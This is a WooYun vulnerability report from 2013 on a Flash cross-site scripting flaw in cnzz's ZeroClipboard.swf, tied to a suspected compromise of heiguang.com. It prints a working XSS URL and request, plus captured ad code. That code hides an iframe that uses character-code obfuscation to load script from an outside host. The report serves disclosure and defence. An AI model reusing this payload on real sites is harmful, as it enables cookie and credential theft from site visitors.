当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043214

漏洞标题:cnzz一处flash跨站+黑光网疑似被入侵(一种攻击方式)

相关厂商:cnzz.com

漏洞作者: xsjswt

提交时间:2013-11-18 12:11

修复时间:2014-01-02 12:12

公开时间:2014-01-02 12:12

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-18: 细节已通知厂商并且等待厂商处理中
2013-11-18: 厂商已经确认,细节仅向厂商公开
2013-11-28: 细节向核心白帽子及相关领域专家公开
2013-12-08: 细节向普通白帽子公开
2013-12-18: 细节向实习白帽子公开
2014-01-02: 细节向公众公开

简要描述:

cnzz一处flash跨站+黑光网疑似被入侵

详细说明:

赶集网云监控再次立功
监控到的flash xss点
http://adm.cnzz.com/js/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);//&width&height
调用flash的站点,黑光网

GET /js/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);//&width&height HTTP/1.1
Host: adm.cnzz.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive^M
Referer: http://www.heiguang.com/

漏洞证明:

1.png


http://js.adm.cnzz.net/atos.php?sid=194947&width=1366&height=768&isf=1&domain=&proid=&pid=&fid=&mid=&floorid=&time=1384741937392392&referer=&href=http%3A%2F%2Fwww.heiguang.com%2F


(function(){var servertime = +new Date();window['starttime_194947']&&(window['totaltime_194947']=servertime-window['starttime_194947']);})();(function(){(function(url){var url=url;function R(name,fn){return window[name]?window[name]:window[name]=fn;}R('errorLoad',function(obj,id){var sid=arguments[1],nowtime=+new Date(),alltime,turl;turl=url+"?sid="+id+"&iurl="+(encodeURIComponent(obj.src)||'')+"&type=img&loadtime=-1";if(cnzz_request){setTimeout(function(){cnzz_request(turl);},0);}});})("http://action.adm.cnzz.net/bench.gif");function jsLoaded(d,o){var a,d=d;return d?(a=window.adloaded=window.adloaded||[],o&&1==o?(a["load_"+d]=a["load_"+d]||0,a["load_"+d]=1,void 0):(a["load_"+d]=a["load_"+d]||0,a["load_"+d])):1}if(("function" == typeof jsLoaded)&&jsLoaded(194947)){return false;}function showAd(b,a,c){c=="iframe"?a&&1==a.nodeType?iframeout(b||{},a):document.write(b.data||""):a&&1==a.nodeType?window.setTimeout(function(){a.insertAdjacentHTML("afterBegin",b)},0):document.write(b);return!0};function html(a,b){var c="",f=a.adtype||"",d=a.width||0,e=a.height||0,c=a.data;a.config.originaltype=="rich"&&(b=null);if(b&&1==b.nodeType)b.style.cssText=b.style.cssText+(d>=0?";width:"+d+"px;":"")+(e>=0?";height:"+e+"px;":"");if(!c)return!1;showAd(c,b,f)};html({"id":194947,"data":"<iframe  width=0 height=0 src=http:\/\/adm.cnzz.com\/js\/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);\/\/&width&height     name=\"window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,122,104,117,103,101,115,102,46,99,111,109,47,120,120,47,111,90,83);document.body.appendChild(window.s)\"><\/iframe><DIV id=\"cnzz\" style=\"display:none\"><script type=\"text\/javascript\">var cnzz_protocol = ((\"https:\" == document.location.protocol) ? \" https:\/\/\" : \" http:\/\/\");document.write(unescape(\"%3Cspan id='cnzz_stat_icon_5702888'%3E%3C\/span%3E%3Cscript src='\" + cnzz_protocol + \"s9.cnzz.com\/stat.php%3Fid%3D5702888' type='text\/javascript'%3E%3C\/script%3E\"));<\/script><\/div>","adtype":"rich","width":"-1","height":"-1","config":{"height":"-1","width":"-1","originaltype":"rich"}},document.getElementById("cnzz_fixedslot_ad_194947"));"function" == typeof jsLoaded && (jsLoaded(194947,1));})();

修复方案:



不蛤蛤
李菊福

版权声明:转载请注明来源 xsjswt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-18 14:43

厂商回复:

非常感谢,我们正在修复

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-18 13:12 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

    关注

  2. 2013-11-18 13:28 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    我还是来关注一下

  3. 2013-11-18 14:08 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    账号 密码都再cookie里。。。 这么快就有人提交了

  4. 2013-11-18 14:15 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    。。。。

  5. 2013-11-18 14:51 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    @0x_Jin 是你搞的?

  6. 2013-11-18 14:56 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    @xsjswt 我没搞。。。 但是那个XSS我知道 cookie存在cookie里

  7. 2013-11-21 09:37 | Ebon_Wolf ( 实习白帽子 | Rank:48 漏洞数:24 | 您好,我似咣咚朲,需要服务吗?专业酱油工...)

    @xsjswt 成都的基友??

  8. 2013-11-21 15:11 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    @Ebon_Wolf sort of that